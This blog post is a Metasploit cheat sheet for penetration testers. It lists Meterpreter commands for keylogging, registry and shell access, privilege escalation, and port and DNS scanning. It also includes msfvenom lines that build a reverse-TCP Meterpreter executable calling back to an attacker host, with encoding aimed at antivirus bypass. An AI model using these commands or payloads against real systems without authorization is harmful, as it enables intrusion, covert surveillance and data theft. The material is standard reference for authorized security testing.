Metasploit cheat sheet – Metasploit is an excellent pen-testing tool. We can use it in a wide range of tasks, and we have discussed it before in numerous Metasploit hacking-related posts.
In this post, we will also look at the shutdown-type commands in Metasploit.
Metasploit cheat sheet
Networking commands
ipconfig: Show network interface configuration
portfwd: Forward packets
route: View/edit network routing table
Process handling commands
getpid: Display the process ID
getuid: Display the user ID
ps: Display running processes
kill: Stop and terminate a process
getprivs: Attempt to enable as many privileges as possible
reg: Access target machine registry
shell: Access target machine shell
execute: Run a specified program
migrate: Move to a given destination process ID
Interface / output commands
enumdesktops – Show all available desktops
getdesktop – Display current desktop
keyscan_start – Start keylogger on the target machine
keyscan_stop – Stop keylogger on the target machine
setdesktop – Switch to a given desktop
keyscan_dump – Dump keylogger content
Metasploit cheat sheet
Search for a module: search [regex]
Specify an exploit to use: use exploit/[ExploitPath]
Specify a payload to use: set PAYLOAD [PayloadPath]
Show options for the current module: show options
Set options: set [Option] [Value]
Start exploit: exploit
Useful Auxiliary Modules
#Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
#DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
#FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
#Proxy Server:
msf > use auxiliary/server/socks4
msf > run
msfvenom commands
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.
msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example:
Reverse Meterpreter payload as an executable, redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format options (specified with -f); --help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example:
Encode a payload 5 times using the shikata_ga_nai encoder and output it as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Meterpreter commands
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Shut down or reboot the target machine
cd: Change directory
lcd: Change directory on the local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process Meterpreter is loaded in.
migrate: Move Meterpreter into a given destination process ID
Managing sessions
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]
That's it. I hope this post was helpful to you. If you have any doubts, you can ask me in the comment section.